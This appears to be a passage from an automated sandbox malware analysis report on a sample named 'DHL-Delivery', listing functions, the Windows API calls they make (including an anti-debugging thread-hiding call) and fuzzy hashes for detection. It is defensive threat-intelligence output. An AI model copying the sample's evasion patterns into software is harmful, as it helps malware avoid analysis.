                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeLibraryLoadThunk
                        • String ID:
                        • API String ID: 3353482560-0
                        • Opcode ID: 4451e7636b46aa55112edc068250cde81bba1f9ac0e5bcd80e20442841d2fb9d
                        • Instruction ID: 9e31d21bfac63bcc3027b39a768e6db47666a8c8bffd44797c16511ddc0e2de3
                        • Opcode Fuzzy Hash: 4451e7636b46aa55112edc068250cde81bba1f9ac0e5bcd80e20442841d2fb9d
                        • Instruction Fuzzy Hash: 3C419E7568A3E2CEC721DE7488A53C67B63EF52550F94409DC9428B256C733860ACBA7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 021A3150, Relevance: 1.6, APIs: 1, Instructions: 123libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: bde57db9f0a9bc992c43f48756e2222a6bef3231cfa6e744d61b792bc6ad90ae
                        • Instruction ID: 87896e15059329c16d82fa32c72f3915fd727bd832cf7c13252c8250d5480fc7
                        • Opcode Fuzzy Hash: bde57db9f0a9bc992c43f48756e2222a6bef3231cfa6e744d61b792bc6ad90ae
                        • Instruction Fuzzy Hash: A0315C6DBC1307DDDF38297499F47EB2297AF066B0F960136DCA5D3140E32484C9CA52
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 021A5796, Relevance: 1.6, APIs: 1, Instructions: 120libraryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeLibraryLoadThunk
                        • String ID:
                        • API String ID: 3353482560-0
                        • Opcode ID: 10a81690a2a93da1ee259b104a22b91fac218c4d56b24a85e0764797e200ef32
                        • Instruction ID: 5819f9b9baadc223e361ace1c917d8b83d0fa928dabde225d7e190203f868379
                        • Opcode Fuzzy Hash: 10a81690a2a93da1ee259b104a22b91fac218c4d56b24a85e0764797e200ef32
                        • Instruction Fuzzy Hash: 8E318A7968A3E28EC321DE7488A53C67B63EF62540F5480DDC5418B257D773860ACBE7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 021A38EF, Relevance: 1.6, APIs: 1, Instructions: 114libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: c8515d2c0b1b679f0155be16304bd91dd9fd1be2809e3ad0bb0af0806977a165
                        • Instruction ID: 02e3fd5c4db692a25110f729da1ac9b436bafa92556c4a875725525fdc17d84b
                        • Opcode Fuzzy Hash: c8515d2c0b1b679f0155be16304bd91dd9fd1be2809e3ad0bb0af0806977a165
                        • Instruction Fuzzy Hash: 4A21388CBC9306ACEE3525B81DB97FF05479F42BB4FE2412AECC2D3145E765848A8913
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 021A399A, Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c6562dccd52fd28bdf4232b204b14b0f6b0552e10a59ba67d52c3b17865c9b90
                        • Instruction ID: 53a45c7b2b2a5fdb47241f5d4d68286677f758807ac7486323bfa9a2a615c935
                        • Opcode Fuzzy Hash: c6562dccd52fd28bdf4232b204b14b0f6b0552e10a59ba67d52c3b17865c9b90
                        • Instruction Fuzzy Hash: 45214B8CBC5305ADEF34297859B93FF11979F46A70FA64526DC9293141E32584C58A03
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 021A57DA, Relevance: 1.6, APIs: 1, Instructions: 107libraryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeLibraryLoadThunk
                        • String ID:
                        • API String ID: 3353482560-0
                        • Opcode ID: 7fed5e76d5a3cb538801e937b719218e2ff2c43c92633a62c6fdc862d979cf4a
                        • Instruction ID: 76d5ac73e5da5fcec43ddff3a60c614a27123b1e4bd3824eae02ad90690a9f49
                        • Opcode Fuzzy Hash: 7fed5e76d5a3cb538801e937b719218e2ff2c43c92633a62c6fdc862d979cf4a
                        • Instruction Fuzzy Hash: 7B319B7A68E3E38EC312DA7588A53C67B62EF52540B5480DDC1418B267D773C606C7E7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 021A647E, Relevance: 1.6, APIs: 1, Instructions: 98libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c95e1c14848067f7c89da75c301d8b7a7665f64de7c72d8d8604c762a0e69c20
                        • Instruction ID: 3de00dad7c85702870ac292742053c4b825098b3fd5cd01a8ed96dd5bc365d35
                        • Opcode Fuzzy Hash: c95e1c14848067f7c89da75c301d8b7a7665f64de7c72d8d8604c762a0e69c20
                        • Instruction Fuzzy Hash: AF2125766DF3F28EC312DA75849A2C17B62EE1294075840EDD142CB263D7A6870AC7F7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 021A5837, Relevance: 1.6, APIs: 1, Instructions: 95libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 5cd2395d784b93e6b6895aa7fe6dfe949cb8ab6166aceb43f76fc60858ee42bc
                        • Instruction ID: 2210fa230cd5ced10e48bf1158b82fde0a6bef12c370d3c75f358915a2c33fb6
                        • Opcode Fuzzy Hash: 5cd2395d784b93e6b6895aa7fe6dfe949cb8ab6166aceb43f76fc60858ee42bc
                        • Instruction Fuzzy Hash: 512136762DF3E34DC312DA75889A1C27B62ED1294074840EDC142CB1A3D762870AC7E7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 021A64A5, Relevance: 1.6, APIs: 1, Instructions: 92libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 1dd17203f723ae8bd65ef113f4b6b4c6486ba1d1141ce023f008020c613787be
                        • Instruction ID: 89a320afdf40a6e0b725778a386b23b1326a594895dcb29d53213e7cbdc9b931
                        • Opcode Fuzzy Hash: 1dd17203f723ae8bd65ef113f4b6b4c6486ba1d1141ce023f008020c613787be
                        • Instruction Fuzzy Hash: E82126766DF3E38DC312DA75849A2C27F62ED1294074840DDC1428B263D767870AC7E7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 021AB348, Relevance: 1.6, APIs: 1, Instructions: 88libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 904595a497ed3804b388bfd0c157ba66305071f9386e5124cffed27f521cab6a
                        • Instruction ID: acc97feb672401ab2fce7060c23468da2128c01121f434e57aaf7f971f561ce7
                        • Opcode Fuzzy Hash: 904595a497ed3804b388bfd0c157ba66305071f9386e5124cffed27f521cab6a
                        • Instruction Fuzzy Hash: 57115B8DAC5306BCDF3835B81AB87FF15478F06A70FA2052AEC82D3105F36584C88913
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 021A4004, Relevance: 1.6, APIs: 1, Instructions: 84libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 104e57c89bc552e6a3c424e9a541190cc31755e03f55e34afc27c1fe62e7837b
                        • Instruction ID: 2aa0c8aef38e6a8ac7767670b0f45746a638aa7560a9e07621aad91b87a76664
                        • Opcode Fuzzy Hash: 104e57c89bc552e6a3c424e9a541190cc31755e03f55e34afc27c1fe62e7837b
                        • Instruction Fuzzy Hash: 8C11E38DAC6306ACEF3435B919B87FF15478F06AB0FE2452AEC82D3105E76584CA8902
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 021A83B9, Relevance: 1.6, APIs: 1, Instructions: 78librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        • Opcode ID: 754b74b59c0beadf1b5b5e54c81342093bdab90e62a06f8407db8328a425acd7
                        • Instruction ID: 09f4a14e557afad7dcc2efb98f43f22a9f4981d4e3c2943186c20221434260ce
                        • Opcode Fuzzy Hash: 754b74b59c0beadf1b5b5e54c81342093bdab90e62a06f8407db8328a425acd7
                        • Instruction Fuzzy Hash: 7D114C9DFC6306ACDF3439B945B93EE16539F06AB0F924466EC42D3101E77685898913
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A83AC, Relevance: 1.6, APIs: 1, Instructions: 75librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        • Opcode ID: 67dc515dba15488b25c5d5e3f5b6c1342b9d1606cde30ec88de46233dbf80779
                        • Instruction ID: 4fe670f85ea553cf6ad5c417fe5787465bf1195de30575c18d5457eccefbbd9b
                        • Opcode Fuzzy Hash: 67dc515dba15488b25c5d5e3f5b6c1342b9d1606cde30ec88de46233dbf80779
                        • Instruction Fuzzy Hash: B0112B8CBC6305ACDF3835B959B87FF15579F06AB0FA2452AEC82D3105F72584C94913
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A83F4, Relevance: 1.6, APIs: 1, Instructions: 70librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        • Opcode ID: d9a40da110f353ef003371691e59014806868850d0438cb2941cad94f381c71d
                        • Instruction ID: 9221e82cabdb0f0583c80ac9b78426a82b4796ce2bd8d857d0656f66ea9f712c
                        • Opcode Fuzzy Hash: d9a40da110f353ef003371691e59014806868850d0438cb2941cad94f381c71d
                        • Instruction Fuzzy Hash: AD01899DBC7316ADDF3035B580B93EE26439E02A60F910466EC42D3201F3768584C653
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A844D, Relevance: 1.6, APIs: 1, Instructions: 53librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        • Opcode ID: 520f0b2cf67b739046e0225c3429068caea7924f376e79da054d34f0421b9158
                        • Instruction ID: fbb90b06b919a2ee7f87d5d7621bb8e6d1d8da331915adaac2172ac2e78b1491
                        • Opcode Fuzzy Hash: 520f0b2cf67b739046e0225c3429068caea7924f376e79da054d34f0421b9158
                        • Instruction Fuzzy Hash: 0EF0ACAE7CA357DD8B3039B640F83DE27839C06DA07900459EC42C3200E3328245C9A3
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A15CB, Relevance: 1.6, APIs: 1, Instructions: 50nativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationProcessTerminateThread
                        • String ID:
                        • API String ID: 1477408370-0
                        • Opcode ID: 562577d1c2b77bb81510f12e7943d0ada693c9a0a588ce6cfd8b280ea3461f1a
                        • Instruction ID: 9baab5b20553deecde94261d3675546fefdeffc11ac90a959aed7f71473cab6b
                        • Opcode Fuzzy Hash: 562577d1c2b77bb81510f12e7943d0ada693c9a0a588ce6cfd8b280ea3461f1a
                        • Instruction Fuzzy Hash: E5017B29888B8368E333547C492A7D624926F27B70FD48399DC66472C5F3A20047C6A6
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A080F, Relevance: 1.5, APIs: 1, Instructions: 39nativethreadCOMMON
                        Download Yara Rule
                        APIs
                        • EnumWindows.USER32(021A0882,?,00000000), ref: 021A082D
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: EnumInformationThreadWindows
                        • String ID:
                        • API String ID: 1954852945-0
                        • Opcode ID: 972edf86bb8901d7aec8f969063e8b703e0aa2995cea2fce9f446c5ad6fa96e6
                        • Instruction ID: 315cbba66a9ff37cc56a4c7fc37b9092941aa3cd94f7a35836cbbf6bb4943d22
                        • Opcode Fuzzy Hash: 972edf86bb8901d7aec8f969063e8b703e0aa2995cea2fce9f446c5ad6fa96e6
                        • Instruction Fuzzy Hash: 1BF059786C63169FD300AD2888B57C63392AF1FB90F210018DDAAC7285D736848AC69A
                        Uniqueness

                        Uniqueness Score: 16.53%

                        Function 021A849C, Relevance: 1.5, APIs: 1, Instructions: 39librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        • Opcode ID: 9ffd683a0c2ed2bfc1f65df5ac9fbe0acf60a720a79b9ed5b999a0dbaff3fdad
                        • Instruction ID: afa5d933edd32a1a0536ce86b050463c7965e88260366ba060ddfc48aaf660cc
                        • Opcode Fuzzy Hash: 9ffd683a0c2ed2bfc1f65df5ac9fbe0acf60a720a79b9ed5b999a0dbaff3fdad
                        • Instruction Fuzzy Hash: 78F0E57EBC6353CE9B207DBA81A82CD2B939C55DA0B904099EC06C7210E732C646C9B3
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A56BD, Relevance: 1.5, APIs: 1, Instructions: 38libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 372455f70026cf8c0c6047f8ce270f14ca87b850a73c0625f379e4158ee44a49
                        • Instruction ID: 86818e6f42f14bc5a8b8faa4ea2893a169c731c2de225939f8246d2109f37a74
                        • Opcode Fuzzy Hash: 372455f70026cf8c0c6047f8ce270f14ca87b850a73c0625f379e4158ee44a49
                        • Instruction Fuzzy Hash: 84F0597A6DB3E34ED301E874844628137629A1188074880EAD102C7273DB26C70BD2F7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 021A07B8, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                        • EnumWindows.USER32(021A0882,?,00000000), ref: 021A082D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: EnumWindows
                        • String ID:
                        • API String ID: 1129996299-0
                        • Opcode ID: cded09201d916b6ffd4384fd16944bdb77fe74e81ae3c056eec4d2c29912534c
                        • Instruction ID: 50f3694d5bd006f75d97f6b1c0f08f7cb85fcbc40764d181d5f40c316fc1ff3e
                        • Opcode Fuzzy Hash: cded09201d916b6ffd4384fd16944bdb77fe74e81ae3c056eec4d2c29912534c
                        • Instruction Fuzzy Hash: 70F0593C9853099FC7005E2089753C63751BF1E791F220149DDE58B1D6D726848ACB8A
                        Uniqueness

                        Uniqueness Score: 0.21%

                        Function 021A1621, Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                        Download Yara Rule
                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID:
                        • API String ID: 560597551-0
                        • Opcode ID: 87f6038b99467cb1685fd711cd4127a9db009eb40b2df05c5116812538d2faac
                        • Instruction ID: 6c196069e6dbccf70b7339cf088cbdd5f8b150895e39fcba56c3f5433ecf99a5
                        • Opcode Fuzzy Hash: 87f6038b99467cb1685fd711cd4127a9db009eb40b2df05c5116812538d2faac
                        • Instruction Fuzzy Hash: 1BE02229A843A359D62264B849663C921522B12770F904244DD22872D1F7A28046C6A3
                        Uniqueness

                        Uniqueness Score: 0.04%

                        Function 021A56B7, Relevance: 1.5, APIs: 1, Instructions: 29libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 29ce739eb23cf1295769ee625f33958ee8e1ecb7d7954a6167b2f192834e2422
                        • Instruction ID: 990808360a3f58f5217172585bf7144c884cd215bbfacb6839aabeaf01a0b74c
                        • Opcode Fuzzy Hash: 29ce739eb23cf1295769ee625f33958ee8e1ecb7d7954a6167b2f192834e2422
                        • Instruction Fuzzy Hash: 22E0AB3A6CB3E24EC301F838481628137228A1149074C82DAC402C32A3DB21C70ED2A7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 021A5352, Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000003,00000000,00000000,021A52B1,021A53FC,021A0AE6,?,?,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A53C7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 2de80237a2675273c824c40b7ceb527adcceca5768e4b6c6f6ff960e24da68fd
                        • Instruction ID: 8e3852c21696622cd8baf7494b129aff70ddf3a9be4ce7eaa7b731a5e623e6d1
                        • Opcode Fuzzy Hash: 2de80237a2675273c824c40b7ceb527adcceca5768e4b6c6f6ff960e24da68fd
                        • Instruction Fuzzy Hash: 61E0C23CB88302BCF6280850ADABFEE12164FD0BC0F54401DBF49B91C0A7D00954C002
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 021A5367, Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000003,00000000,00000000,021A52B1,021A53FC,021A0AE6,?,?,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A53C7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: c9744405fb262165574e55f36152400cdb7645d44a9e7bf0a61c6cda12ef2b09
                        • Instruction ID: de6b44a94f70c9e6857859a5327f0549791b513d2f51728d199a6ed76c498146
                        • Opcode Fuzzy Hash: c9744405fb262165574e55f36152400cdb7645d44a9e7bf0a61c6cda12ef2b09
                        • Instruction Fuzzy Hash: CFE0CD7DA973939DE3109CB5848ABC63622AF61754F50406CFE05EB141F7B18616C076
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 021A4C4B, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                        Download Yara Rule
                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID:
                        • API String ID: 560597551-0
                        • Opcode ID: 64622a79d16adfbdf5b17c95bda489e40850016053e5d818aab16c6b8b8667a2
                        • Instruction ID: 61f4eaf9f87e324adc250b85175b1e78d585964f311dada79f6de911b498f229
                        • Opcode Fuzzy Hash: 64622a79d16adfbdf5b17c95bda489e40850016053e5d818aab16c6b8b8667a2
                        • Instruction Fuzzy Hash: 02E026395863525AC212A9A888963C836927F03630F9007D8D527C72D1F3728202C6A7
                        Uniqueness

                        Uniqueness Score: 0.04%

                        Function 021A4C49, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                        Download Yara Rule
                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID:
                        • API String ID: 560597551-0
                        • Opcode ID: 5b0d1bd9457a7f04bb33e280e8eb45688ec578a46fba887126277872ffa809f3
                        • Instruction ID: 831ab0b3741a4aef7777e261469e7014ee8703828ed917dbe3b7ca37b3d480d9
